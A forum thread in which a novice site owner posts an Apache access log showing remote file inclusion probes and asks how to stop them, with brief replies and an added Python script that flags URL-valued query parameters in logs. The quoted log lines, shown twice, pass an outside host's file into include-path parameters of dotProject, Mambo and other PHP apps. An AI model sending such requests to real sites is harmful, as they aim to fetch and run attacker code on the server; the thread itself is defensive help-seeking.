PHP security

  • martinjamesroberts
    New Member
    • May 2008
    • 1

    PHP security

    Hi I am a newb to all this so please ignore my ignorance...

    This morning I have discovered someone has tried to exploit my site. The information is below. My index.php file contains a flash file which has a form, the PHP for which is in a separate file named 'feedback.php'.

    Basically I want to stop these exploits and I wonder how I can do it? I have asked on a few forums but nothing is working! It seems I need to somehow restrict access or redirect bad requests. Please help, I can't afford to be blacklisted for this.

    Many Thanks
    Code:
    209.3.11.34 - - [20/May/2008:01:14:38 +0200] "GET /admin/business_inc/saveserver.php?thisdir=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631
    209.3.11.34 - - [20/May/2008:01:14:38 +0200] "GET /dotproject/includes/db_adodb.php?baseDir=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631
    209.3.11.34 - - [20/May/2008:01:14:39 +0200] "GET /interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631
    209.3.11.34 - - [20/May/2008:01:14:40 +0200] "GET /saveserver.php?thisdir=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631
    209.3.11.34 - - [20/May/2008:01:14:41 +0200] "GET /index.php?page=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 200 4008
    209.3.11.34 - - [20/May/2008:01:14:41 +0200] "GET /index.php?x=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 200 4008
    65.36.241.81 - - [20/May/2008:02:02:09 +0200] "HEAD / HTTP/1.1" 200 0
    81.80.12.13 - - [20/May/2008:02:18:13 +0200] "GET / HTTP/1.0" 200 3983
    209.3.11.34 - - [20/May/2008:02:22:02 +0200] "GET /mambo/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631
    209.3.11.34 - - [20/May/2008:02:22:02 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 200 4008
    209.3.11.34 - - [20/May/2008:02:22:03 +0200] "GET /index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631
    209.3.11.34 - - [20/May/2008:02:22:03 +0200] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631
    65.36.241.81 - - [20/May/2008:03:03:55 +0200] "HEAD / HTTP/1.1" 200 0
    209.3.11.34 - - [20/May/2008:03:13:48 +0200] "GET /phplive/help.php?css_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631
    209.3.11.34 - - [20/May/2008:03:13:49 +0200] "GET /webcalendar/tools/send_reminders.php?includedir=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631
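
A way to triage the access log in this post, as an added example that is not part of the original thread: it flags every request that passes an absolute URL as a query-parameter value and separates the ones answered with a 2xx status from the rest. The function names are hypothetical, and the sample lines are copied from the log above.

```python
import re
from urllib.parse import unquote

# Constructed sample: five lines copied from the access log in the post above.
SAMPLE_LOG = """\
209.3.11.34 - - [20/May/2008:01:14:38 +0200] "GET /admin/business_inc/saveserver.php?thisdir=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631
209.3.11.34 - - [20/May/2008:01:14:39 +0200] "GET /interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631
209.3.11.34 - - [20/May/2008:01:14:41 +0200] "GET /index.php?page=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 200 4008
81.80.12.13 - - [20/May/2008:02:18:13 +0200] "GET / HTTP/1.0" 200 3983
209.3.11.34 - - [20/May/2008:02:22:02 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 200 4008
"""

# Apache common log format: host ident user [time] "request" status bytes
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
ABSOLUTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def url_valued_params(target):
    """Names of query parameters whose decoded value is an absolute URL."""
    names = []
    for pair in target.partition("?")[2].split("&"):
        name, _, value = pair.partition("=")
        if ABSOLUTE_URL.match(unquote(value)):
            names.append(unquote(name))
    return names


def triage(log_text):
    """One record per request that passes a URL as a parameter value."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        params = url_valued_params(m["target"]) if m else []
        if params:
            hits.append({
                "ip": m["ip"],
                "path": m["target"].partition("?")[0],
                "params": params,
                "status": int(m["status"]),
                "review": m["status"].startswith("2"),  # 2xx: script ran with this input
            })
    return hits

if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print(hit["status"], "REVIEW" if hit["review"] else "not served", hit["path"], hit["params"])
```

On this sample the two `/index.php` requests are marked REVIEW. A 200 only shows that the script exists and ran with that input, so the follow-up is to read how `index.php` treats those parameters.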
  • TheServant
    Recognized Expert Top Contributor
    • Feb 2008
    • 1168

    #2
    We need to see your code, and for a whole site, that is hard. Where do you think they're getting in from? Post that code if you have an idea.


    • dlite922
      Recognized Expert Top Contributor
      • Dec 2007
      • 1586

      #3
      Originally posted by martinjamesroberts
      Hi I am a newb to all this so please ignore my ignorance...

      This morning I have discovered someone has tried to exploit my site. The information is below. My index.php file contains a flash file which has a form, the PHP for which is in a separate file named 'feedback.php'.

      Basically I want to stop these exploits and I wonder how I can do it? I have asked on a few forums but nothing is working! It seems I need to somehow restrict access or redirect bad requests. Please help, I can't afford to be blacklisted for this.

      Many Thanks
      Code:
      209.3.11.34 - - [20/May/2008:01:14:38 +0200] "GET /admin/business_inc/saveserver.php?thisdir=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631
      209.3.11.34 - - [20/May/2008:01:14:38 +0200] "GET /dotproject/includes/db_adodb.php?baseDir=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631
      209.3.11.34 - - [20/May/2008:01:14:39 +0200] "GET /interact/modules/forum/embedforum.php?CONFIG[LANGUAGE_CPATH]=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631
      209.3.11.34 - - [20/May/2008:01:14:40 +0200] "GET /saveserver.php?thisdir=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631
      209.3.11.34 - - [20/May/2008:01:14:41 +0200] "GET /index.php?page=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 200 4008
      209.3.11.34 - - [20/May/2008:01:14:41 +0200] "GET /index.php?x=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 200 4008
      65.36.241.81 - - [20/May/2008:02:02:09 +0200] "HEAD / HTTP/1.1" 200 0
      81.80.12.13 - - [20/May/2008:02:18:13 +0200] "GET / HTTP/1.0" 200 3983
      209.3.11.34 - - [20/May/2008:02:22:02 +0200] "GET /mambo/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631
      209.3.11.34 - - [20/May/2008:02:22:02 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 200 4008
      209.3.11.34 - - [20/May/2008:02:22:03 +0200] "GET /index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631
      209.3.11.34 - - [20/May/2008:02:22:03 +0200] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631
      65.36.241.81 - - [20/May/2008:03:03:55 +0200] "HEAD / HTTP/1.1" 200 0
      209.3.11.34 - - [20/May/2008:03:13:48 +0200] "GET /phplive/help.php?css_path=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631
      209.3.11.34 - - [20/May/2008:03:13:49 +0200] "GET /webcalendar/tools/send_reminders.php?includedir=http://82.127.69.88/dotProject/files/1.gif?/ HTTP/1.1" 404 1631

      Haven't seen it in a long time, but is that the Apache log? I don't get it... is this your site? http://82.127.69.88/

      or is that the hacker's/exploiter's site?

      I don't know how you're gonna get blacklisted if it's a contact form that sends email to you? You're not an email server.

      Let me know if I've got this all wrong.

      Dan
